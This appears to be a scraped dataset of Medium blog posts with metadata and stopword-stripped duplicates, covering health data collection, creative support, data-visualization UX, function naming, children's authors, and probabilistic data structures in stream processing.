Title Here’s Need Health Data CollectionContent Opinion Here’s Need Health Data Collection Tech enable valuable experience health data Image Lukas Unsplash data constantly collected YouTube history calendar reminder daily workout possible due rapid technological growth According National Center Biotechnology Information 58 US cellphone user downloaded healthrelated app onto device even greater percentage already preinstalled software saved health data Krebs Duncan 2015 data combined million even billion people’s creates big data incredibly large datasets time method data collection evolved paralleling development science technology allowed company harness massive datasets shaping modern product fingertip technology becomes even stronger influence daily life imperative understand effect kind data collection technological lens consider multiple perspective within Image James Unsplash prime stakeholder debate health data collection undoubtedly major technology company namely Apple Amazon Facebook Google Microsoft company see healthcare brilliant somewhat untapped opportunity expand innovation spur economic growth Jia Low author TechHQ independent current technology business news site examines company eager health data discus 2019 Google partnered Ascension one largest healthcare provider America acquired FitBit source accumulated heap patient record around world data Google claim want aid doctor hospital managing patient effectively quickly via electronic health record EHRs make astounding 80 health record today Amazon strong competitor cloud storage 2018 purchase online prescription service PillPack signal push target healthcare wealthiest tech giant Apple put privacy forefront Apple investing users’ health data make Health platform seamless reliable “middleman” personal health management Portable device like Watch iPhone teem health apps feature positive impact Low cite 2019 Watch detected biker’s severe fall contacted 911 thus saving life Mark Zastrow wellregarded writer prestigious peerreviewed Nature scientific journal cover Apple Google’s recent collaboration joint COVID19 contact tracing app provide accurate feedback infected people notification came contact someone tested positively point together solved many privacy efficiency issue prior method implementing encrypted key eliminating access personallyidentifying data Low Zastrow agree appropriate privacy measure — encryption pseudonym onboard processing strong algorithm like — technology company intention share goal inventing betterment society clear technology company provide new innovation targeted help manage health user crucial investigate user incorporate life According study Rock Health 2015 2018 4000 US adult respondent user adopted tool record rate 2018 89 surveyed used one health tool device increase 80 2015 proof user traction improved Authors Sean Day Megan Zweig nationallyrecognized technology health funding company Rock Health construct argument discussing common mean data collected live video telemedicine wearable mobile tracking online review online health information 2018 wearable use began shifting towards managing health condition diagnosis rather tracking fitness Additionally author note positive impact health data collection reporting user rated tool average 41 5 star high performance Image Daria Unsplash second way explore users’ opinion technology company handling health data trust level Lance Lambert graduate Duke University University Cincinnati working Fortune data analyst report study conducted Fortune 
surveyed 1267 randomly selected US adult Lambert first describes many respondent liked health tracking apps device “illuminating” “see life told minute” clarifies unfortunately many user unaware data stored even though technically provide consent using health data collection apps often disregard “fine print” found 40 respondent fully willing data utilized Amazon Apple smaller percentage Google Facebook Interestingly demonstrates many people paradox utilize digital health data tool widely regularly also wary technology company using data potentially public’s benefit Image Campaign Creators Unsplash third role involved heavily healthcare professional specifically doctor James Gaston senior director data modeling Healthcare Information Management Systems Society say “Our cultural definition healthcare moving away brickandmortar centric event broader patientcentric continuum encompassing lifestyle geography social determinant health fitness data addition traditional healthcare episodic data” sheer volume health data collected implies accurately represents target audience significantly improving timeconsuming costly ineffective policy direct doctorpatient communication asserts limited data collected doctor analyzed granular level pattern difficult spot consequently innovation decrease Medical data users’ device combined doctorspecific session incorporates large array different type data — search query app statistic wearable output environmental factor individual lifestyle — thus provides informative result process leveraging big data technology assist individualized healthcare without doctor physically present called telemedicine Constant collection streaming patients’ device proved Apple Samsung user allow doctor family user consistently track overall health improve care say Valarie Romero telemedicine professor University Arizona scholar oppose Gina Neff senior research fellow Associate Professor Department Sociology University Oxford quote anonymous physician survey “I don’t need data need resources” explains big data valued various way different people professional believe dataintensive solution take excessive time away providing quality care Neff claim creating healthcare solution built vast data collection ass multiple viewpoint well evident technology company user healthcare professional different stance topic digital health data collection device technology company favorable outlook work develop new product beneficial citizen varying level trust data used straightforward purpose healthcare industry propose data collection increase efficiency accuracy scalability others say undermines ability professional Cumulatively perspective suggest health data collection device — active consent privacy personal choice ensured — generally positive public technology companiesTags Data Health Technology People Education
3,865
What to Do When Your Loved Ones Don’t Support Your Art
What to Do When Your Loved Ones Don’t Support Your Art Don’t try to hire them for a job they don’t want. Photo by Thought Catalog on Unsplash The Pain is Real One of the hardest things about being a writer or any kind of creative is when the people we care about don’t support us. When those who are closest to us snub or poo-poo our creative efforts, it hurts — a lot. I have plenty of people in my life who cheer me on as I pursue my passion for writing. For that, I’m grateful. However, there are some people I expected to be in my corner who aren’t having it. Not even a little bit. This has been a source of hurt for me for three years since I’ve started writing again. I’ve been working through this rejection and making strides in coming to terms with it. Until this week, that is. I got a notification that someone close to me who rarely interacts with my blog’s Facebook page commented. I was so excited. When I opened the notification to read it, it was to point out there was a typo in my post. Wow. Really? You never support anything else I do, but you take the time to point out a typo? Nope. Just nope. At first, I responded with a good-natured reply after fixing my typo. I even used a smiley emoji, though I wasn’t feeling smiley. Upon further reflection, I deleted the comment and my reply. Why? Because I don’t need people embarrassing me on a platform I’ve worked hard to create. It wasn’t about the typo. I make them from time to time. We all do. It was that this person’s only effort to reply to my work was to point out a mistake. The plus side is it spurred me to write this article. So there’s that. How to Respond Maybe you’re in the same boat. Maybe there are people you would love to have support you who just aren’t that into what you’re doing. Maybe you have people who ignore you or point out your typos. Yeah, it stinks. I have some good news and a bit of advice. They aren’t your people when it comes to your creative pursuits. Don’t try to hire them for a job they don’t want. I’ve known this for a while, but today’s public typo comment struck that old nerve. When these things happen, here’s how we can choose to respond. DON’T RESPOND — You aren’t obligated to justify yourself and your art to anyone. Not even those close to you. If others don’t share your enthusiasm, don’t waste time worrying about it like I have in the past (or this week). Keep creating. Know that you are good enough without their support. You can and will succeed without their help. APPROACH THEM — If you feel strongly enough and believe saying something would help (in my case I knew it would not), say something. In a non-defensive way, call or sit the person down and share how important what you are doing is to you. No texting, no emails — voice contact only. Let the person know that his or her lack of support hurts. It could be that those who aren’t supporting you simply don’t realize how you feel. FIND YOUR TRIBE — The best people for supporting creative people are other creative people. Join a local writers’ or artists’ group. Find online groups to connect with other creatives. Even if you have the support of those you care about, other artists will support you in a special way that your loved ones cannot. We are a quirky, caring, supportive bunch. THANK YOUR SUPPORTERS — Remember to thank those who care about what you are doing. My husband is the absolute best. He is endlessly encouraging and loving. I know I am fortunate that the person closest to me in all the world supports me. 
Not everyone has this kind of support. I thank him and others for believing in me because it’s only right to acknowledge their kindness. Be a Cheerleader The best response to negativity is positivity. Please don’t get me wrong. This is grueling work. Avoiding a claws-out confrontation is not easy when you feel hurt. This is especially true when you are passionate about your work. Let the naysayers do their thing and find someone to encourage instead. If you know how it feels to be overlooked or snubbed by those you care about, make sure you don’t do the same. Acknowledge those who are working hard to create something. Read their writing. Buy their art. Go to their concerts. Share their work with others by social media or word of mouth. I’ve gotten into an online critique group with two other women and it has been wonderful. I met them through an online writers’ group. We have never met but have been critiquing each other’s work and cheering each other on. A couple of years ago, I started a small local writers’ group and meet with them monthly. We are strengthened and encouraged by our time together. As the proverb says, iron sharpens iron. Becoming a member of Medium and giving support through claps, comments, and highlights is a great way to be a cheerleader. In doing so, you are helping other writers make money as well. What could be better? Take heart. Not everyone is going to love what you are doing. Not everyone will understand and acknowledge your passion. Choose wisely in how you respond and above all, don’t stop creating. The world needs your art.
https://medium.com/swlh/what-to-do-when-your-loved-ones-dont-support-your-art-856cdc842f5
['Tracy Gerhardt-Cooper']
2019-06-16 23:11:06.279000+00:00
['Relationships', 'Creativity', 'Life Lessons', 'Writing', 'Self Improvement']
Title Loved Ones Don’t Support ArtContent Loved Ones Don’t Support Art Don’t try hire job don’t want Photo Thought Catalog Unsplash Pain Real One hardest thing writer kind creative people care don’t support u closest u snub poopoo creative effort hurt — lot plenty people life cheer pursue passion writing I’m grateful However people expected corner aren’t even little bit source hurt three year since I’ve started writing I’ve working rejection making stride coming term week got notification someone close rarely interacts blog’s Facebook page commented excited opened notification read point typo post Wow Really never support anything else take time point typo Nope nope first responded goodnatured reply fixing typo even used smiley emoji though wasn’t feeling smiley Upon reflection deleted comment reply don’t need people embarrassing platform I’ve worked hard create wasn’t typo make time time person’s effort reply work point mistake plus side spurred write article there’s Respond Maybe you’re boat Maybe people would love support aren’t you’re Maybe people ignore point typo Yeah stink good news bit advice aren’t people come creative pursuit Don’t try hire job don’t want I’ve known today’s public typo comment struck old nerve thing happen here’s choose respond DON’T RESPOND — aren’t obligated justify art anyone even close others don’t share enthusiasm don’t waste time worrying like past week Keep creating Know good enough without support succeed without help APPROACH — feel strongly enough believe saying something would help case knew would say something nondefensive way call sit person share important texting email — voice contact Let person know lack support hurt could aren’t supporting simply don’t realize feel FIND TRIBE — best people supporting creative people creative people Join local writers’ artists’ group Find online group connect creatives Even support care artist support special way loved one cannot quirky caring supportive bunch THANK SUPPORTERS — Remember thank care husband absolute best endlessly encouraging loving know fortunate person closest world support everyone kind support thank others believing it’s right acknowledge kindness Cheerleader best response negativity positivity Please don’t get wrong grueling work Avoiding clawsout confrontation easy feel hurt especially true passionate work Let naysayer thing find someone encourage instead know feel overlooked snubbed care make sure don’t Acknowledge working hard create something Read writing Buy art Go concert Share work others social medium word mouth I’ve gotten online critique group two woman wonderful met online writers’ group never met critiquing other’s work cheering couple year ago started small local writers’ group meet monthly strengthened encouraged time together proverb say iron sharpens iron Becoming member Medium giving support clap comment highlight great way cheerleader helping writer make money well could better Take heart everyone going love everyone understand acknowledge passion Choose wisely respond don’t stop creating world need artTags Relationships Creativity Life Lessons Writing Self Improvement
3,866
3 UX Design Principles for Better Data Visualization
Three UX Design Principles 1. Just KISS I am sorry, it is not what you are thinking ;) KISS means “keep it simple, stupid”. Good user experience doesn’t mean stacking all the beautiful graphics together. It may look amazing, but your attention is dispersed everywhere on the screen, and to be honest, it is tiring. It is also not about creating complicated graphs that show off how scientific and professional they look; that only scares people off. There are some graphs we’d better avoid using based on this principle. For example, only use a 3D chart if it is really necessary. Most of the time, the third dimension just doesn’t serve any purpose. Instead, it makes the visuals heavy and hard to digest. Another example is the secondary y-axis: it takes more friction and effort to understand which axis the chart is mapped against. Like the chart below, can you easily tell which axis is for the bar chart and which one is for the line chart within 3 seconds? Therefore, keep it minimal and eliminate clutter. These simple tricks can additionally make your dashboard look cleaner instantly: 1. Use no more than five colours (or 3 main colours) in one dashboard. 2. Un-bold chart captions and titles. Make them concise. 3. Remove chart gridlines and borders. Delivering knowledge is not about showing off how skilled you are; rather, it is about building a common understanding between deliverers and receivers. Just KISS! 2. Form Follows Function Built upon the previous point, it is essential to design a dashboard that actually delivers the message to the receivers, and hence meets the key objectives. That is, prioritize the core functions and insights the dashboard needs to demonstrate, then choose the forms correspondingly. Focus on selecting the most appropriate chart for the data type. A bar chart compares the measures of categorical data. A histogram looks very similar to the bar chart because it also consists of bars. However, instead of comparing categorical data, it breaks a numeric variable into interval groups and shows the frequency of data falling into each group. A line chart indicates the trend and development of variables over time, usually represented by one numeric variable plotted against a date-type variable. It is commonly used in time series analysis. A pie chart is used to represent the percentage and weight of categorical data, intuitively depicting proportions of a whole. A map shows numeric data that can be grouped by regions. Using gradient colors is a great way to visualize the density difference across various geographical locations. A scatter plot visualizes the correlation between two numeric variables. It is commonly used to identify relationships such as linear or logistic regression. These are the most basic charts. There are more complicated graphs that perform advanced analytics, such as heatmap, treemap, box plot, etc. That’s another story that is definitely worth diving into; however, it is not the main focus of this article. Most importantly, always keep the users in mind and be clear about the objectives. It doesn’t matter how fancy the form is if it doesn’t serve any function. 3. Take Advantage of Hierarchy Hierarchy is essential for indicating where viewers should look first. It can be constructed implicitly using size, color, position, etc. Size: Large and bold fonts are more likely to stand out, whereas small, thin text is less prioritised.
If we are using text to display statistics, make sure it stands out from other text elements such as titles and captions. This principle goes beyond text: using different sizes of shapes also creates a hierarchical layout. Position: Human visual perception determines that we are more likely to look at the top-left corner or the center of the screen. Therefore, the most important information should be located in these areas, where viewers direct most of their attention. Color: Bright colors are more likely to stand out, whereas pale colors recede into the background. Another general rule is that a color that breaks the consistency will be perceived as carrying the important message. Therefore, make use of contrast to make the key information grab your audience’s attention.
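To make these principles concrete, here is a minimal matplotlib sketch that applies the decluttering tips from the first principle and uses size and color contrast for hierarchy. The monthly revenue figures are invented purely for illustration.
import matplotlib.pyplot as plt
import numpy as np

# Hypothetical monthly revenue figures, used only to demonstrate the styling.
months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun"]
revenue = np.array([12, 15, 14, 18, 21, 24])

fig, ax = plt.subplots(figsize=(6, 3.5))

# One main color; the latest bar is highlighted to create hierarchy through contrast.
colors = ["#c0c0c0"] * (len(months) - 1) + ["#1f77b4"]
ax.bar(months, revenue, color=colors)

# Declutter: remove borders (spines), gridlines, and y-axis ticks.
for spine in ["top", "right", "left"]:
    ax.spines[spine].set_visible(False)
ax.grid(False)
ax.set_yticks([])

# Concise, un-bolded title; the key number is the most prominent text on the chart.
ax.set_title("Monthly revenue (k$)", fontsize=11, loc="left")
ax.text(len(months) - 1, revenue[-1] + 0.5, "24k", ha="center", fontsize=13)

plt.tight_layout()
plt.show()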
https://medium.com/analytics-vidhya/3-ux-design-principles-for-better-data-visualization-70548630ff28
['Destin Gong']
2020-09-16 04:04:43.714000+00:00
['Data', 'Data Analysis', 'UX', 'Design', 'Dashboard']
Title 3 UX Design Principles Better Data VisualizationContent Three UX Design Principles 1 KISS sorry thinking KISS mean “keep simple stupid” Good user experience doesn’t mean stacking beautiful graphic together look amazing attention dispersed everywhere screen honest tiring also creating complicated graph show scientific professional look scare people graph we’d better avoid using based principle example use 3D chart really necessary time third dimension doesn’t serve purpose Instead make visuals heavy thick digest Another example secondary yaxis take friction effort understand axis chart mapped Like chart easily tell axis bar chart one line chart within 3 second Therefore keep minimal eliminate clutter simple trick additionally make dashboard look cleaner instantly 1 Use five colour 3 main colour one dashboard 2 Unbold chart caption title Make concise 3 Remove chart gridlines border Delivering knowledge showing skilled rather highlight common understanding deliverer receiver KISS 2 Form Follows Function Built upon previous point essential design dashboard actually delivers message receiver hence required meet key objective prioritize core function insight dashboard need demonstrate choose form correspondingly Emphasize selecting appropriate chart aligned data type Bar chart compare measure categorical data Histogram look similar bar chart also consists bar However instead comparing categorical data break numeric data interval group show frequency data fall group Line chart indicates trend development variable time usually represented one numeric data datetype variable commonly used time series analysis Pie chart used represent percentage weight categorical data Intuitively depict proportion whole Map show numeric data grouped region Using gradient color great way visualize density difference various geographical location Scatter plot visualizes correlation two numeric variable Common identify relationship linear regression logistic regression etc basic chart complicated graph perform advanced analytics heatmap treemap box plot etc … That’s another story definitely worth diving deeper However main focus article importanly always keep user mind clear objective doesn’t matter fancy form doesn’t bring function 3 Take Advantage Hierarchy Hierarchy essential term indicating viewer look first constructed implicitly using size color position etc Size Large bold font likely stand whereas small thin text le prioritised using text display statistic make sure pop text form title caption principle go beyond text using different size shape also creates hierarchical layout Position Human visual perception determines likely look top left corner center screen Therefore important information located area viewer distribute attention Color Bright color likely stand whereas pale color brought background Another general rule color break consistency perceived important message Therefore make use contrast make key information grab audience’s attentionTags Data Data Analysis UX Design Dashboard
3,867
A Useful Framework for Naming Your Classes, Functions, and Variables
Actions Are the Heart of a Function Actions are the verb part of your function name. They’re the most important part in describing what the function does.
- get Accesses data immediately (i.e., shorthand getter of internal data).
function getFruitsCount() {
  return this.fruits.length;
}
- set Declaratively sets a variable from value A to value B.
let fruits = 0
function setFruits(nextFruits) {
  fruits = nextFruits
}
setFruits(5)
console.log(fruits) // 5
- reset Sets a variable back to its initial value or state.
const initialFruits = 5
let fruits = initialFruits
setFruits(10)
console.log(fruits) // 10
function resetFruits() {
  fruits = initialFruits
}
resetFruits()
console.log(fruits) // 5
- fetch Requests data, which takes time (e.g., an async request).
function fetchPosts(postCount) {
  return fetch('https://api.dev/posts', {...})
}
- remove Removes something from somewhere. For example, if you have a collection of selected filters on a search page, removing one of them from the collection is removeFilter, not deleteFilter (and this is how you’d naturally say it in English as well):
function removeFilter(filterName, filters) {
  return filters.filter(name => name !== filterName)
}
const selectedFilters = ['price', 'availability', 'size']
removeFilter('price', selectedFilters)
- delete Completely erases something from the realm of existence. Imagine you’re a content editor, and there’s that notorious post you wish to get rid of. Once you clicked a shiny delete-post button, the CMS performed a deletePost action, not a removePost one.
function deletePost(id) {
  return database.find({ id }).delete()
}
- compose Creates new data from existing data. This is mostly applicable to strings, objects, or functions.
function composePageUrl(pageName, pageId) {
  return `${pageName.toLowerCase()}-${pageId}`
}
- handle Handles an action. Often used when naming a callback method.
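The snippets above are written in JavaScript; the handle entry can be sketched the same way. Below is a rough Python equivalent, where the Button class and its on_click hook are purely hypothetical stand-ins for whatever emits the action:
# Hypothetical Button class, used only to illustrate the naming convention:
# the callback that reacts to an action is named handle<Action>.
class Button:
    def __init__(self):
        self._on_click = None

    def on_click(self, callback):
        self._on_click = callback

    def click(self):
        if self._on_click:
            self._on_click()

def handle_link_click():
    print("link opened")

button = Button()
button.on_click(handle_link_click)
button.click()  # prints "link opened"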
https://medium.com/better-programming/a-useful-framework-for-naming-your-classes-functions-and-variables-e7d186e3189f
[]
2020-12-24 15:17:13.007000+00:00
['Python', 'Software Development', 'Programming', 'Software Engineering', 'JavaScript']
Title Useful Framework Naming Classes Functions VariablesContent Actions Heart Function Actions verb part function name They’re important part describing function get Accesses data immediately ie shorthand getter internal data function getFruitsCount return thisfruitslength set Declaratively set variable value value B const fruit 0 function setFruitsnextFruits fruit nextFruits setFruits5 consolelogfruits 5 reset Sets variable back initial value state const initialFruits 5 const fruit initialFruits setFruits10 consolelogfruits 10 function resetFruits fruit initialFruits resetFruits consolelogfruits 5 fetch Requests data take time eg async request function fetchPostspostCount return fetchhttpsapidevposts remove Removes something somewhere example collection selected filter search page removing one collection removeFilter deleteFilter you’d naturally say English well function removeFilterfilterName filter return filtersfiltername name filterName const selectedFilters price availability size removeFilterprice selectedFilters delete Completely era something realm existence Imagine you’re content editor there’s notorious post wish get rid clicked shiny deletepost button CMS performed deletePost action removePost one function deletePostid return databasefind id delete compose Creates new data existing data mostly applicable string object function function composePageUrlpageName pageId return pageNametoLowerCasepageId handle Handles action Often used naming callback methodTags Python Software Development Programming Software Engineering JavaScript
3,868
The 3 Children’s Authors You Must Read
Children’s literature is one of the most sacred types of writing in the entire medium. Kids are so impressionable and curious. They want to know the answers to the big questions, taking in all of the information available to them like a sponge. It takes a truly special author to tap into their own childlike imagination, remembering what intrigued them so many years ago about the world around them. What makes a high quality book for young ones? Does it teach them about history and people? Does the story have the characters that the reader can relate to, while also not being too harsh about the realities of life? Is the language overblown with large vocabulary that is not yet understandable? At the same time, kids are not stupid. The writer should never talk down to their audience. I wanted to present three children’s authors that I enjoyed growing up that I know others benefited from just as much as me. They write timeless stories that are still enjoyed to this day, and hopefully for many more generations into the future. Enjoy! Mary Pope-Osborne Author of one of the best-selling children’s series of the past 30 years, her Magic Tree House saga has been mixing culture, history, and fun into a magical mix for multiple generations of children. Jack and Annie are the brother-sister duo protagonists of the novels, allowing children of both genders to see themselves in the novels while reading about their various adventures. Pope-Osborne runs the gamut on historical and cultural references, sending the siblings back in time through their neighborhood tree house to an enormous set of locations and events. The American Civil and Revolutionary Wars, the sinking of the Titanic, the 1906 San Francisco earthquake, and the volcanic eruption of Mt.Vesuvius are just a sampling of the iconic time pieces that kids are introduced to in accurate and magical ways. History is something that people of all ages should educate themselves on more, so it is vital to kindle a love and interest in it from an early age. These books mix fantastical elements and fictional characters right into the nonfictional happenings of real life in a way that I’ve rarely seen in youth literature. By blurring the line between what’s real and what isn’t, the author convinces the child to have a lifelong love learning about the fascinating countries, mountains, languages, animals, disasters, and peoples that combine to make up our magical planet! Photo by Vincent Branciforti on Unsplash Andrew Clements Known most for the 1996 best-seller Frindle, detailing a student’s made-up term for a pen, Andrew Clements had a unique ability to get inside the mind of the average 11 year old and put their thoughts and emotions onto the page for his readers. His literature hones in on a single protagonist who usually butts heads with an adult somewhere in the classroom or domestically. Nothing too serious, but the problems all give enough food for thought to munch on for a couple hundred pages. The kid who stars in the work is given respect by being put on equal footing with the adult who is opposing them. By taking the authority figure and putting that person on equal terms with the younger student, Clements makes both characters see eye-to-eye a little better. By the end of the novels, the child protagonist has grown up a little more, and the adult has gained greater appreciation for the creativity and innocence of the immature mind. 
Although Clements himself is no longer with us, his work will continue to be relatable to elementary and middle school students for decades to come. Themes like imagination, friendship, leadership, and teamwork never go out of style. Lemony Snicket/Daniel Handler Handler published under the pen name Lemony Snicket when releasing his iconic set of novels, A Series of Unfortunate Events during the early 2000’s. The saga of the three orphaned Baudelaire siblings who are constantly on the run from the evil Count Olaf has sold millions of copies throughout its lifetime and been adapted into a film in 2004 and a Netflix series between 2017–2019. What makes this work such a must-read for any late-elementary school to middle-school aged kid is the amount of exposure they will receive to real-life problems, but doing so with a whimsy and sense of humor which is unmatched. The protagonists of the series use their inventiveness, book-smarts, and love of one another to overcome any problem they are faced with, which includes arson, underage marriage, and murder. These are all mature themes that have gotten the books banned from the libraries of certain schools around the United States, but rest assured that all of the topics are covered by Handler in a way that is not disturbing to a child. Tone and wording make the macabre elements more cartoony or comical than would be indicated in an adult novel. It introduces young readers to key literature analysis practices that they will certainly be doing much more often as they age into new curriculums. The books force the reader to debate the motivations and intentions behind every protagonist and antagonist, advancing past the surface level plot trope discussions that normally happen in early novel discussions. They’re a must for children and adults alike. And when you can get both age groups in the same room to talk about a book, that’s when you know it’s special.
https://medium.com/age-of-awareness/the-3-childrens-authors-you-must-read-ff3c7e9b8998
['Shawn Laib']
2020-12-08 05:16:01.012000+00:00
['Education', 'Books', 'Children', 'Creativity', 'Teaching']
Title 3 Children’s Authors Must ReadContent Children’s literature one sacred type writing entire medium Kids impressionable curious want know answer big question taking information available like sponge take truly special author tap childlike imagination remembering intrigued many year ago world around make high quality book young one teach history people story character reader relate also harsh reality life language overblown large vocabulary yet understandable time kid stupid writer never talk audience wanted present three children’s author enjoyed growing know others benefited much write timeless story still enjoyed day hopefully many generation future Enjoy Mary PopeOsborne Author one bestselling children’s series past 30 year Magic Tree House saga mixing culture history fun magical mix multiple generation child Jack Annie brothersister duo protagonist novel allowing child gender see novel reading various adventure PopeOsborne run gamut historical cultural reference sending sibling back time neighborhood tree house enormous set location event American Civil Revolutionary Wars sinking Titanic 1906 San Francisco earthquake volcanic eruption MtVesuvius sampling iconic time piece kid introduced accurate magical way History something people age educate vital kindle love interest early age book mix fantastical element fictional character right nonfictional happening real life way I’ve rarely seen youth literature blurring line what’s real isn’t author convinces child lifelong love learning fascinating country mountain language animal disaster people combine make magical planet Photo Vincent Branciforti Unsplash Andrew Clements Known 1996 bestseller Frindle detailing student’s madeup term pen Andrew Clements unique ability get inside mind average 11 year old put thought emotion onto page reader literature hone single protagonist usually butt head adult somewhere classroom domestically Nothing serious problem give enough food thought munch couple hundred page kid star work given respect put equal footing adult opposing taking authority figure putting person equal term younger student Clements make character see eyetoeye little better end novel child protagonist grown little adult gained greater appreciation creativity innocence immature mind Although Clements longer u work continue relatable elementary middle school student decade come Themes like imagination friendship leadership teamwork never go style Lemony SnicketDaniel Handler Handler published pen name Lemony Snicket releasing iconic set novel Series Unfortunate Events early 2000’s saga three orphaned Baudelaire sibling constantly run evil Count Olaf sold million copy throughout lifetime adapted film 2004 Netflix series 2017–2019 make work mustread lateelementary school middleschool aged kid amount exposure receive reallife problem whimsy sense humor unmatched protagonist series use inventiveness booksmarts love one another overcome problem faced includes arson underage marriage murder mature theme gotten book banned library certain school around United States rest assured topic covered Handler way disturbing child Tone wording make macabre element cartoony comical would indicated adult novel introduces young reader key literature analysis practice certainly much often age new curriculum book force reader debate motivation intention behind every protagonist antagonist advancing past surface level plot trope discussion normally happen early novel discussion They’re must child adult alike get age group room talk book that’s know it’s 
specialTags Education Books Children Creativity Teaching
3,869
Streaming With Probabilistic Data Structures: Why & How
In recent years, streaming libraries seem to have evolved significantly. To name a few, we’ve seen Akka Streams, KafkaStreams, Flink, Spark Streaming and others, becoming increasingly popular. There might be numerous reasons for that. A common motivation for using stream processing in your systems is to avoid heavy computations upon raw data at read-time. Instead, we can move those computations to an earlier stage — around the time when the raw data is produced. This architectural pattern allows us to obtain better response times in time-critical transactions, and has surged in popularity in correlation with the general growth of the data organizations handle. In this story, I will examine a rather complicated scenario that cannot be easily solved by the intuitive capabilities that streaming libraries usually offer. I will demonstrate how probabilistic data structures can help us mitigate a common anti-pattern often encountered in stream processing applications: carrying non-aggregative raw data deep down into a streaming topology for calculations, such as distinct count of elements. Before that, I will briefly review how streaming, in general, helps in maintaining aggregations of data, and why it might be a good idea to adopt it in some use-cases. I will use KafkaStreams for demonstrations along the way, but the concepts explored here can be applied in virtually any streaming library. Examples are written in Scala. Aggregating Upon A Stream Oftentimes, we want to aggregate raw data into some meaningful representation that will serve a business need later on. The simplest example for this, perhaps, is the WordCount program, which is kind of the HelloWorld of many streaming libraries. Here is an implementation of it using KafkaStreams. Basically, what it does is: consume some source Kafka topic as a stream, split each value into single words, group that stream by each word, count the occurrences per word, and produce the results to another Kafka topic. The basic idea behind using aggregations in your systems is planning ahead. If you figure out what you want to know about the raw data at a later stage, you can aggregate it and shape it into a form that represents the answers to those questions — right when you first know about the raw data. That means it happens before those questions are even asked. In fact, some might never be asked, because practically, we are preparing answers for all possible questions we might need answers for! Stream processing aggregation in a nutshell This approach stands in complete opposition to the more conventional one — querying a database upon request and then crunching the results in order to achieve some desired result. This might work well in small apps maintained by small or medium sized teams, but becomes less practical with big data, where boundaries between domains and teams naturally emerge. In that scenario, maintaining aggregations is often the adequate solution to various business requirements. Without stream processing, applications need to query and compute upon state in real time The Problem At Hand: Distinct Hashtag Count Alas, not all aggregations are achieved with the same degree of ease. It is no wonder that WordCount is so common as a beginner’s example — it is very easy to implement and understand. But let’s explore a different scenario.
Take a social media ecosystem where we need to keep track of how many unique hashtags each user has mentioned in their posts. At first glance, the streaming solution for this request seems like a direct continuation of what we’ve seen in WordCount. We could consume post data, group it by user, and then extract & aggregate the hashtags used, perhaps in some Set, which would allow us to easily obtain our desired metric — distinct count. A pseudo-topology that seemingly answers the requests in an adequate way This is what our KafkaStreams topology might look like: A few things happen here. First, I’ve used type aliases in order to avoid the semantically-meaningless String flooding the code. Furthermore, I’ve extracted the logic of obtaining a Set[Hashtag] from a Post to a private function. Other than that, this is exactly what was just described. One of the things I like about KafkaStreams is how intuitive the API is — I think it is pretty easy to grasp and understand this piece of code, even if you haven’t worked with KafkaStreams before. One thing to remember is that this topology will continuously produce messages upon each change to the aggregation, and might be seen as a stream of updates. If you only need the latest state, you can define the output topic as log-compacted. There’s just one problem with this implementation: we have an unbounded data structure in our topology, which means our streaming application can become more memory-heavy than we might have predicted. Remember we said that aggregations are about transforming raw data in a way that fits our read-time needs? Well, our current implementation seems to have violated that concept. We don’t really need that Set[Hashtag]; we just want to know its size. But how can we maintain that number in a streaming application without keeping the underlying Set available? Can we do better? Probabilistic Data Structures To The Rescue Well, of course we can! This is where probabilistic data structures come in. If you haven’t heard of them, don’t worry, we’re going to explore an example together. We will focus on HyperLogLog (aka HLL), a probabilistic data structure that is aimed at solving the very problem we’re facing: … the count-distinct problem… [which] is the problem of finding the number of distinct elements in a data stream with repeated elements (Wikipedia) While the initial, Set-based solution will always be 100% accurate, HyperLogLog suggests a tradeoff: the allocated memory will be of a fixed size, but it might not be absolutely accurate at all times. By and large, the error rate is correlated with the allocated memory. Moreover, in most cases, the error will be of relatively small severity — that is, the estimated count might be off by just a bit. This is why HyperLogLog is considered a probabilistic data structure. In many use cases, this is a reasonable deal. If you’re working on a scenario in which you cannot have any error at all, then this kind of data structure is probably not suitable for your needs. A Scala Implementation Algebird is a neat Scala library created by the folks at Twitter, which is aimed at providing “abstractions for abstract algebra”. A significant part of that library revolves around approximate data types, and includes a HyperLogLog implementation. We’ll try to adapt our KafkaStreams app to use it, but first, let’s examine how to work with Algebird’s HyperLogLog implementation. The HLL type is the data structure itself.
It responds to the #approximateSize method, allowing us to obtain the desired number — set-size, which is also known as cardinality. Similarly to working with the naïve Set , here we will also need to add elements to our data structure. Unlike Set , though, adding elements to an HLL is slightly more complex. The thing is, elements added aren’t kept within the HLL , as they are in a conventional Set . That’s the magic of HyperLogLog! If you’re curious about how it actually works, there are tons of videos or articles about it online. Previously, we relied on Set ‘s direct API for adding entries to the set. Algebird’s support for HyperLogLog relies on a common abstraction to achieve the same goal — combining things. That abstraction is called Monoid . Generally speaking, a Monoid for some type A lets us get an empty A and combine any two A ’s. And so, in order to add an element to an HLL , we need to obtain a HyperLogLogMonoid . This is achieved easily: val hllMonoid: HyperLogLogMonoid = new HyperLogLogMonoid(bits = 8) Note that you decide how many bits to allocate — this allows us to control the error rate. We can then get our empty, zero-state HLL : val init: HLL = hllMonoid.zero And simply add elements to it: val newElementData: Array[Byte] = "foobar".toCharArray.map(_.toByte) val newElement: HLL = hllMonoid.create(newElementData) val updatedHLL: HLL = init + newElement As you can see, we can use the HyperLogLogMonoid#create method in order to create a new HLL by passing an Array[Byte] to it. After that, we can add our new HLL to the existing one and get a new one with an updated state. With this knowledge, we can prepare an aggregation function that will replace the previous one we’ve had. We will group all this goodness together under a helper object, Aggregation : As you can see, we are using HyperLogLogMonoid#sum here, in addition to #create . It allows us to combine several HLL s into one, which suits our needs perfectly: we’ll extract the Hashtag s from each Post , then sum them into a HLL , which we will add to the existing, aggregative HLL . Exactly what we wanted to achieve! Putting It All Together With our aggregation function and initialization value ready, we can now go back to our KafkaStreams topology and use them there: I needed to adapt just two lines from the former implementation — the parameters passed to aggregate (line 22) and the way to obtain the (estimated) cardinality, in the map function (line 24). There’s just one thing left — we need to find a way to obtain a Serde[HLL] . If you are unfamiliar with KafkaStreams, this is Serde ‘s definition according to the official documentation: Every Kafka Streams application must provide SerDes (Serializer/Deserializer) for the data types of record keys and record values (e.g. java.lang.String ) to materialize the data when necessary. Essentially, KafkaStreams might need a certain Serde for various operations. Our code would not compile without it. Since aggregation by nature is a stateful operation (simply because we operate on information which is not bounded at the current message being processed), KafkaStreams needs to know how the information can be serialized and deserialized. Luckily, it is pretty easy to get a Serde[HLL] , like this: And with that we’re pretty much done! We’ve managed to incorporate 